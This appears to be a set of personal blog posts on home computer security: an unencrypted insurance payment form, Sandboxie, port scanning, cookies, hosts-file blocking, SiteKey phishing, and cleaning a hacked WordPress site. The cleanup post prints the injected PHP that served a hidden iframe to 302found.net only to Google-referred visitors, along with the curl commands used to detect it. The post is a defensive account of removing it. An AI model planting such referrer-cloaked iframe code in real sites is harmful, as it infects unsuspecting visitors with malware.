Got an interesting dilemma I want to share you.  I was on the phone the other day squaring away a bill with my home owners insurance company, Preferred Mutual.  I paid a bill over the phone and asked if I get enrolled in automatic deductions from my checking account, this way I wouldn’t need to worry about it, something I like to do with most of my bills. Anyway, the representative told me that I can enroll in automatic deductions online and proceeded to help me navigate to the following page:

http://www.pminsco.com/Billing/AEFT.aspx

Here is the screenshoot of the page,  you can click on the image to get a bigger picture.

I was about to start filling out the form with sensitive information including banking routing information when I stopped dead in my tracks. Notice the URL above is not https but rather http which tells me that the connection between my browser and the web server at Preferred mutual is not encrypted.  Meaning that my data including banking routing information is sent over the Internet for anyone to read straight out; not good my friends.  If I was reading the news on CNN or looking up movie times online, the connection is typically not encrypted, which is totally fine and expected.  However, if at anytime I am submitting sensitive data, logged on to my bank, or even reading mail at Gmail, then it is absolutely imperative that the connection is over a secured and encrypted line.  SSL (https) establishes an end to end encryption between my browser and the server I’m connecting to.  As someone who has done some programming on the web, I know that the form page can, in fact, be a non SSL URL and then when the form is actually submitted (user clicks on submit button), the page with the sensitive data is sent to the server over SSL.  The problem with that way of handling it is that the user (myself) does not know for sure that the submitted data will be encrypted on SSL. The only way to check would be to actually look at the HTML source code and see where this form goes from this point.  Here is a snippet of HTML code:

<form name=”aspnetForm” method=”post” action=”AEFT.aspx” id=”aspnetForm”>

This shows that the form is submitted to a page resource named “AEFT.aspx” which happens to be the server side code that actually generated the page with the form.  In essence, this server side code is multifunctional and can show the form you see above in one context and process the form in another context when the user submits the form. In any case, no matter which context, this page in unencrypted and that is precisely why I’m not going to use it. Some might argue, “Come on – don’t be so paranoid; what are the chances of someone intercepting your data?”.  True, it is a long shot but not a chance I’m willing to take.  Keep in mind that if you were using an unprotected  WIFI or internet offered at a hotel, this data would be sent over the air in the clear; easy to intercept and even more of a reason to refrain from entering your private data on a page like this.  However, in my case at home where I would send it over an encrypted WIFI connection I’m playing it safer and plan on asking Preferred Mutual if I can give them the information over the phone.

What do you think?  Is this something you’d be OK with?  Would love some comments on this post.

I want to talk about this exciting program I’ve been using lately called Sandboxie. I was first introduced to Sandboxie on a SecurityNow prodcast a while back. Then recently, Leo and Steve did another podcast where they did a more in depth look at this now mature program. I even purchased a license which includes all new upgrades to Sandboxie for life! What a great deal! The podcast on Sandboxie couldn’t have come at a more appropriate time for me. I had just purchased a new Dell laptop with Vista; yeah yeah I know I’m a big Apple/Mac fan-boy but I really couldn’t justify spending over my budget for a new Macbook. I ended my dilemma by settling for a bottom of the line Dell Inspiron with Vista. The truth is that I’m actually very happy with my Dell and I’m even happy – so far – with Vista. Everything works – so far so good. After I ordered my laptop I was thinking about how to keep my new system clean and free of anything malicious such as spyware, adware, etc. This happens to be more of a challenge in a Windows environment. Then I heard about Sandboxie.

So what is Sandboxie? A while back we talked a little bit about a Virtual Machine and how I was able to run Windows on my Mac using Parallels. With Parallels you need to set aside memory and actually install the OS you want to run in the VM so that you essentially have two systems on one computer. Sandboxie is a “lightweight” VM that doesn’t actually need a separate OS to run; it runs as a program on Windows. Sandboxie allows you to run any program within a “contained environment”. Within that environment no permanent changes or modifications can be made to your system. So which programs do I run in Sandboxie? I have two programs that are the most likely vectors for something malicious getting into my system. These are my web-browser FireFox and my email client Thunderbird. I, therefore, ran these programs within Sandboxie before I wrote this post. They are running in their separate space and can’t harm my system. I’m a careful user of the Internet and follow some best practices, such as never downloading anything that is not reputable or clicking on a link in an email from someone I don’t know. However, even the most savvy user can be vulnerable; the bad guys are getting smarter and smarter. So what happens if I suspect I may have accidentally clicked on an unsavory link or downloaded a dangerous file? I wipe my sandbox clean and start fresh. Any malicious files or potential mal-ware is contained in the sandbox never able to harm any part of my system outside of the sandbox. How cool is that? Keep in mind that you must start using Sandboxie on a computer that is in a healthy state, otherwise Sandboxie is useless and all bets are off. Reformat your hard drive and install Windows fresh or start with a new computer.

This is all nice and I can see how Sandboxie can be a very useful tool for running programs in isolation but there are times were I would need my program to make changes to my system. Here’s a good example. I’m browsing on the web using FireFox “sandboxed” and then I go to the popular networking site, Facebook, where there is a picture of me posted by a friend that I would like to download, save and share with others. So I click “save picture” and I proceed to save it to My documents and here is the pop-up that appears from Sandboxie:

What’s happening here is that your “sandboxed” Firefox wants to save a file to your documents folder, which is outside the sandbox. If you click “close” the file will be saved – actually saved – in a directory tree under Sandbox C:\Sandbox\goodbin\DefaultBox where “DefaultBox” is your default sandbox (Sandboxie allows you to create different Sandboxes that behave differently for different uses). If you click on the recover box then you are giving Sandboxie permission to save this file to your Documents folder. If you clicked on close and save the file to your “sandboxed” documents folder then you can open your Windows Explorer in “sandboxed” mode and you’ll see the files. See the screen shot below with 2 different Windows Explorers; one in “sandboxed” mode shows [#] the files while the Windows Explorer not “sandboxed” does not show the files

When you download in Sandboxie, it writes all those new files and system modifications (unless you say it’s OK to save outside the sandbox) into the sandbox “C: location” or C:\Sandbox. Remember, nothing changed outside the sandboxed environment.  That means if you downloaded some changes to your “money management” program using Sandbox, you will see those changes only if you run your money program from Sandbox.  If you run it from it’s regular icon, no changes will have taken effect.  For the more technical users this can come in handy if you want to see how a program behaves when it runs on your system.  You run the program sandboxed and then go into the C:\Sandbox directory to see which system files where changed or which new ones were created.  Perhaps you are auditing a program or are curious to see what the change is so that you can feel safe about modifying your system files “unsandboxed”. See the screenshot below showing C:\Sandbox tree.  Notice the different program directories for Thunderbird and Mozilla.

So far, my experience with Sandboxie has been very positive. The interview on the Security Now podcast with the author of Sandboxie, Ronan Tzur from Israel, was very interesting. Sandboxie is a great addition to your security toolbox. Remember, there is no silver bullet security solution and depending on your level of paranoia is how often you clean out your sandbox.

Steve Gibson from GRC.com provides a free port scanning tool called ShieldsUp that I was playing with the other day.  You can perform the scan of your network here Before doing the scan, make sure you have permission from your network administrator since  ShieldsUp will probe ports of the IP address that your browser made the connection from and therefore,  can trip your company’s IDS.  Of course, if you’re doing this from home you will not have to concern yourself with this; just click on the link and proceed with the firewall check.  It’s good to know that this service cannot be used as a hacking tool like NMAP since one cannot scan a specified IP address.

We talked about egress filtering in a prior post – you can refer to that here as a refresher.  A port, also referred to as a software port, is a logical point on the computer where a remote connection takes place.   A popular port number is port 80, where you would typically run the webserver service.  As you read this page, your computer connected to this blog’s Webserver on port 80.  Once the connection on a port is made between a remote computer and the host computer communication can be begin between the two endpoints.  Besides a Webserver, there are other legitimate situations where a service would run on a computer and listen on a port for a client to connect.  For example, the programs like Remote Acess and Filesharing, as well as others, will need to listen for incoming requests.  In order for a remote machine to make a connection on your computer they would need a port or a “window” to get in.  It becomes essential to be aware if such a window to your computer exists and if it’s open and not needed, then it should be closed immediately. 

Most of us home users use some sort of router.  A router allows us to share connections between multiple computers either wired or wireless, which comes in handy these days where it’s quite typical to find more than one computer in today’s homes.  Another feature of the router is that it acts as a firewall between the internet and your computers on your network.  Found this definition of a firewall at GRC.com:

“A firewall ABSOLUTELY ISOLATES your computer from the Internet using a “wall of code” that inspects each individual “packet” of data as it arrives at either side of the firewall – inbound to or outbound from your computer – to determine whether it should be allowed to pass or be blocked. “

So I recently switched my internet service from FIOS to Cablevision.  Cablevison installed the cable and connected our MAC to the Internet without supplying a router.  I didn’t have a chance to get a router yet and our Mac is now directly connected to the Internet.  I’m not worried since our  MAC has a built in software firewall, more on that soon.   So I decided to run ShieldsUp to see the status of my ports prior to hooking up my router.

The test checked all the service ports 0 – 1055.  As you can see in the screenshot,  I recieved almost all blue boxes (representing ports)  with a few green and a “FAILED” rating.  What do the colors blue, green and red mean ?  OK, red means the port is open and listening for incoming connections and ready to serve, which, remember isn’t a bad thing necessarily, it’s only  bad if you aren’t aware of any services that should be running.  Blue means that the port is actually closed and no service is running on that port, which means that no connections can be made. That’s good.  Green is “stealth”, a term Steve Gibson coined.  A port is “stealthed” if, when probing the port  on the remote computer or router, there is no response at all. There  is complete silence on the wire.  There is  a debate in the TCP/IP Internet world regarding the notion of “stealth” vs. closed ports.  Steve felt that a TCP/IP port shouldn’t respond but rather drop the request completely.  In his opinion a “Stealthed” port is better than a closed port.  If a port responds that it is closed that, in itself, tells the remote machine that there was a system on the other end that exists and is “out there”.   If your system is completely “Stealthed” a hacker wouldn’t  even know if your system was actually connected to the Internet.  Steve feels that this added layer of privacy makes it more secure.  The “FAILED” message that I received is indicative to Gibson’s “True Stealth Analysis” which is why I recieved a failed rating from this tool. 

I did some further reading into the MAC firewall and was surprised to learn that the Leopard OS firewall is turned off by default.  Again, if you’re behind a Router (which I was before Cablevision),  there is no need for concern since the router is a firewall.  However, if you have a laptop and connect to the internet in potentially hostile environments it would be a wise thing to turn on your MAC firewall.  It is surprising that Apple, of all companies who toot their horns about security, would ship Leopard’s firewall off by default.  So, the analysis done in the screen shot above is  my MAC connected directly to the internet with no firewall running.  If there were any services running on my computer the ports would have displayed red for open.  Why the few green “Stealthed” ports?  Good question.  It turns out that these ports are actually shut down (”Stealthed”)  by my cable provider Cablevision and one of the ports is 80  – yup, I can’t run a Webserver on my MAC unless I use a router and go through some hoops to properly configure it.

Here is a screen shot of the ShieldsUp test performed on  my Ipod touch mobile browser after configuring my router.  Now, with a router in between the Internet and my the computers on my network I’m fully “Stealthed”.

Since most people love cookies, I thought I’d explore the web cookie topic. Some people have the misconception that cookies can do nefarious things to your computer like copy your files, reveal your identity or damage your computer in some way. As a web user you should understand what cookies do and some of the privacy concerns they raise. With this knowledge I hope you can make an informed decision on what kinds of cookies you allow or block at the browser level, based on your comfort level.

Let’s say you open your browser and go to ‘http://www.amazon.com/‘. You’re visiting the site using a browser and acting as the client, while Amazon.com, running a web server is the server side. Webserver handles HTTP requests. HTTP is a stateless protocol, meaning, when I go to a page at Amazon, the Webserver sends the page to my browser and I see it. When I click on a book that I like, a new request is sent to the Webserver and a new new page is sent back to my browser. The Webserver has no knowledge of the previous page I clicked. They are like humans with no memory, constantly meeting new people. Now you’re going to ask, “What do you mean that Amazon.com is stateless when it shows my name when I visit and it seems to know what books I like?”. Good question. This is where cookies come into play. Cookies allow a webserver to interact with a client in a stateful fashion. A cookie is a parcel of text that is sent to the server with each request which allows the server to remember the client. There are different types of cookies used on the internet; persistent cookies and session cookies (or transient cookies). Each of these types of cookies can be turned on or off in the browser settings. A session cookie allows the webserver to know who you are as you move from page to page. Session cookies store information in the browser memory, which is available for the duration of the browser session. This information is only available as long as your browser remains open. If you close your browser, the session cookie information is gone. It’s called a session cookie for the reason that this type of cookie has a short life. For example, your bank’s site will establish a session cookie after you log on that is valid as long as you are interacting with the bank site. However, if you walk away from your computer for a snack, chances are your session will be invalid so that when you try to click on your checking activity, you’ll be prompted to login again. This ensures against someone walking over to your computer and viewing your private financial data.

A neat little trick to view your session cookie details is the following: Go to a site like ‘amazon.com’ or your bank site (really most sites establish a session cookie to know you as you move around). When you’re on that site, copy and paste javascript:alert(document.cookie)’ into your browser. You’ll see a bunch of name/value pairs. One of them is the SID or session-id, which is the ID that tells the webserver who is making the request. Very cool indeed.

The other type of cookie is called a ‘persistent cookie’. This cookie is actually stored on your computer in a little file with information that is used by the webserver to idenify you. When you return to a site that already has a cookie stored on your computer, the browser automatically passes on the cookie with the request. The webserver now has some identifying data. Now if you visit a site and see that your userid is already populated or if you go to, say, amazon.com and it says, “Welcome back Ron”, the persistent cookie makes this possible. If website A stores a cookie on your computer, website B can’t access the cookie. However, even if a website somehow was able to access a cookie from another site the information in the cookie would not make sense. Only the issuing website would be able to make sense of the data stored in the cookie. Another application of a ‘persistent cookie’ is that it can store information about you that will help the website create a page that was customized by you. The cookie files are stored in /Windows/cookies or in /Windows/profiles/username/cookies directories, where username is replaced with the user’s login name. If your operating system directory is not named Windows (such as Winnt for Windows NT) then look in that directory instead of the Windows directory. If you like, you can delete all of them or delete them for sites you don’t want to be storing cookies.

So what’s the bottom line? Are cookies dangerous in any way? Should I block cookies from being set? The truth is that cookies aren’t dangerous and cannot do anything detremental to your computer. Cookies can’t get any more information about you than what you give the website issuing the cookie. Also, cookies are not able to aid the webserver to read files on your computer.

A good practice that users employ is to browse the internet with cookies turned off by default. Once you visit a site and decide to trust that site, you can then proceed to add the site and allow your browser to accept cookies from this site. You can also view the site’s privacy policies to make sure that you’re comfortable with their policies.

In a future post I will talk about third-party cookies. These cookies raise privacy concerns, since they allow ad companies to track the different types of site you visit and then tailor their ads based on the data collected.

A friend up mine, Shimon Sandler, has a website that got hacked. He turned to me for help. Shimon runs a popular blog on SEO (Search Engine Optimization). When you do a search in Google for “Shimon Sandler” he is always number one (he’s very good at what he does). A few weeks back Shimon’s site got “blacklisted”, which means that when you clicked on the link to his site a message popped on your screen. It said, “Warning: visiting this site may harm your computer”. With the help of Matt Cutts from Google we discovered the “mal-ware”! This malicious software reared it’s ugly head ONLY if the page prior (Referrer) was any page from Google. The “curl” command came in handy in this case. You certainly never want to click on a suspicious link. Curl is a command that allows you to download a URL so that you can view it in text editor rather than requesting it in a browser.

1. Fetch the page with a Google referrer:
curl -H ‘Referer: http://www.google.com/search?hl=en&q=rbn’
http://www.shimonsandler.com/ > /tmp/1

2. Fetch the page with no referrer:
curl http://www.shimonsandler.com/ > /tmp/2

3. Compare the two pages:
diff -u /tmp/2 /tmp/1

The cloaking/malware is included via this line:
<iframe src=”http://302found.net/in.cgi?20″ mce_src=”http://302found.net/in.cgi?20″ style=”display:none;”></iframe>

As you can see, I requested two pages. One was just straight www.shimonsandler.com with no Referrer page and the other was www.shimonsandler.com with a Google Referrer in there. The one with the Google Referrer shows an iframe with a suspicious link! That is the “mal-ware”.

I then logged onto Shimon’s web-server and found the server code responsible for displaying this iframe link.

Here is the command I used to find which script file contained “302found”.
find . -exec grep 302found {} dev/null \;

Here we are:
./wp-content/themes/SS-shimon_sandler/sidebar.php:>? $rf = $_SERVER['HTTP_REFERER']; $se = “google”; if (preg_match(”/$se/”,$rf)) { echo ‘<iframe src=”http://302found.net/in.cgi?20″ mce_src=”http://302found.net/in.cgi?20″ style=”display:none;”></iframe>’;} ?>

You can see the code is doing a check on the REFERRER, and if the URL contains “Google” then it writes out to the HTML this nasty iframe which is set so noone could see it on the page.

Soon after I took out that code in the PHP file, Shimon’s site was once again white-listed.

Here is a great link I found with details on what to do if your site gets hacked. Even if your site was never hacked it’s worth it spend the time to review some basic suggestions on how to properly secure your site. Remember, as with all passwords, make sure its a strong password. Any password that is just a word, like ‘pumpkin’ or ‘dandelions’ is extremely weak. I can’t say exactly how Shimon’s site got hacked, although if you follow some good security principals, it will better protect you and possibly, prevent an attack like this.

The host file can be found in any system hooking up to the Internet and can be a useful tool to help better lockdown your system. A little background first. When I request a web page in my browser, say www.cnn.com, my system (unbeknown to me) sends out a DNS ( Domain Name System) query to find out what the IP address is. DNS was created to save us humans the pain of typing and remembering IP addresses. For example, instead of typing in “http://64.236.91.23/“, we can type meaningful URLs like www.cnn.com.

The “hosts” file on your system acts as a local DNS. If there is an entry there, your system will use the IP in your HOSTS and will not proceed to query DNS over the Internet. If you open up the hosts file (on my windows XP it’s here – C:\WINDOWS\system32\drivers\etc), you will see this line:

127.0.0.1 localhost

The statement above creates a mapping between the domain and IP address. If you type ‘localhost’ in your browser it will take you to your web server on your PC, if a webserver is running. The first column in this statement is reserved for the IP address and the second column always contains the hostname. If you have computers on your network that are using fixed IP’s, the “hosts” file would be a good place to put memorable names for your different machines. For example, you would add an entry like the one below:

192.168.1.4 ourmac

Now, if you need to connect to your MAC computer in order to Telnet or to access a website running on that machine, you would just say “http://ourmac“, or “telnet ourmac”.

This is all nice and convenient, but how does this secure my system from spy-ware, ad-ware or other malicious places I don’t want my computer going to? The solution is simple; add these domains to your host file and point them to 127.0.0.1, essentially making these requests go no-where. Having these entries in your hosts file is telling your computer, “I want you to go to the IP address I set up for this – don’t go and look them up against the DNS”. You may have some entries in the hosts that look like the following:

127.0.0.1 doubleclick.com
127.0.0.1 ads.doubleclick.com
127.0.0.1 ads.msn.com

These entries will block unwanted ad sites. Here you can download an ad-blocking “hosts” file to replace the hosts file on your own PC. Someone spent the time to compile and share this. You can also use the hosts file to block your kids from going to certain sites that you don’t want them going to. While we know there is no “silver bullet” security solution, this hosts file knowledge can help make your computing experience safer.

One of the banks I use is Bank of America. When I first signed up for online access I was asked to create a SiteKey, and I thought, wow, this is clever security. SiteKey attempts to prevent phishing attacks by displaying, upon login, a graphic image that the user has set up themselves and given a unique name. This SiteKey is accomplished by using a secure cookie that is stored on the user’s computer; when logging in the server verifies some encrypted data in the cookie and presents you with your image. The premise is based on the theory that if you see your unique image and name, you can be certain that you are logging into their authorized website and not someone pretending to be Bank of America (phishing scam). That sounds all well and good, right? Not exactly, since a clever hacker using social engineering might just be able to get away with grabbing your logon credentials and hijacking your account. The proof of concept demonstrated here uses a man-in-the-middle attack.

Here is the definition from wikipedia:

In cryptography, a man-in-the-middle attack (MITM) is an attack in which an attacker is able to read, insert and modify at will, messages between two parties without either party knowing that the link between them has been compromised. The attacker must be able to observe and intercept messages going between the two victims….

The breakdown occurs because there needs to be a way to allow someone to logon to a new computer. Let’s say you want to check your balance at work. So, BOA will ask you a secret question and if you answer it correctly you will get that cookie and then future logon attempts won’t need to ask you a security question. Once that is set, all future visits to the BOA site will show you your Sitekey graphic once you put in your username.

Here is how the grad student Christopher Soghoian did it. You get an email from a phisher that looks like a BOA email with the logo and everything. Inside the email is a link that tells you to log on to your account. You click on the link and you are directed to a phisher’s site that looks exactly like BOA’s website. The malicious site asks you for your login id, and you type it in. The phisher site goes off (behind the scenes) and grabs your security question. This is normal since BOA allows you to log on to the site with multiple computers and assumes that you are signing on using a computer that you don’t normally use. The phishing site presents your security question that you had setup when you first signed up with BOA. Then the phisher site goes out to BOA and uses your answer to get your site-key and presents it to you on a page that looks perfectly like BOA. You’re like, “hey that’s my Sitekey – all must be well and you proceed with typing in your password. Your login credentials are now known by the bad guys; you have become a victim of a phishing attack. Some do say that, in reality, this attack could not actually be done, since BOA uses clever monitoring tools provided by RSA that would trigger an alarm if the same IP address was repeatedly requesting this type of first time logins. In any case, it just goes to show you how careful and vigilant one should be when entering private information online.

Here are some tips to avoid get phished:

1. Never ever click on a link to log on to any site from an email. If you stick by that rule, you should be fine. Log in by typing the address directly into your browser or use a bookmark.

2. Always look for security lock to the right of the address, or glance at the address bar to see if the URL starts with https. If not, close your browser (don’t even think of logging on). The video of the attack done by Chris shows the lock to the left of the address bar , which actually threw me off for a second until I saw “http://” without the “s” (very clever indeed).

3. Think about getting some anti-phising software that you can download. Firefox has this technology already built into it.